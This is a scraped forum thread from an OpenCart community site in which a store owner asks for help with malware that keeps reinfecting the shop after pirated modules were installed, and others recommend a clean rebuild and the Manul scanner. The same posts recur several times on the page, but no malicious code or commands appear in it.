MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили", а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен( Надіслати Поділитися на інших сайтах More sharing options...
Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Тогда как по мне ,выход у вас один.Собрать магазин из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву). Папку с картинками слейте и прогоните на компе анти-вирусником.Останется только вставить конфиги и проверенную папку с картинками и заменить нынешнего больного,на просветлённого нового)))) Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались( Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Айболит не лечит, айболит - экспресс диагностика. Лечат другие средства... Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 chukcha, с радостью выслушаю ваше предложение по лечению сайта Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Испытайте в боевых условиях http://yandex.ru/promo/manul#about Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, о пасибки!!! Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, странный этот антивирус. Ругается на кучу здоровых файлов :ugeek: Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Значит вручную перебирайте каждый файл. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы! Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 16 травня 2015 Share Опубліковано: 16 травня 2015 Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым? Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 16 травня 2015 Автор Share Опубліковано: 16 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Надіслати Поділитися на інших сайтах More sharing options... agropuls Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514 Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код(((
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались( Надіслати Поділитися на інших сайтах More sharing options...
chukcha Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Айболит не лечит, айболит - экспресс диагностика. Лечат другие средства... Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 chukcha, с радостью выслушаю ваше предложение по лечению сайта Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Испытайте в боевых условиях http://yandex.ru/promo/manul#about Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, о пасибки!!! Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, странный этот антивирус. Ругается на кучу здоровых файлов :ugeek: Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Значит вручную перебирайте каждый файл. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы! Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 16 травня 2015 Share Опубліковано: 16 травня 2015 Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым? Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 16 травня 2015 Автор Share Опубліковано: 16 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Надіслати Поділитися на інших сайтах More sharing options... agropuls Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514 Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 chukcha, с радостью выслушаю ваше предложение по лечению сайта Надіслати Поділитися на інших сайтах More sharing options...
destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Испытайте в боевых условиях http://yandex.ru/promo/manul#about Надіслати Поділитися на інших сайтах More sharing options...
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, о пасибки!!! Надіслати Поділитися на інших сайтах More sharing options...
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, странный этот антивирус. Ругается на кучу здоровых файлов :ugeek: Надіслати Поділитися на інших сайтах More sharing options...
destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Значит вручную перебирайте каждый файл. Надіслати Поділитися на інших сайтах More sharing options...
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы! Надіслати Поділитися на інших сайтах More sharing options...
destreser Опубліковано: 16 травня 2015 Share Опубліковано: 16 травня 2015 Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым? Надіслати Поділитися на інших сайтах More sharing options...
hitball Опубліковано: 16 травня 2015 Автор Share Опубліковано: 16 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Надіслати Поділитися на інших сайтах More sharing options...
agropuls Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Надіслати Поділитися на інших сайтах More sharing options...
halfhope Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514 Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0
Recommended Posts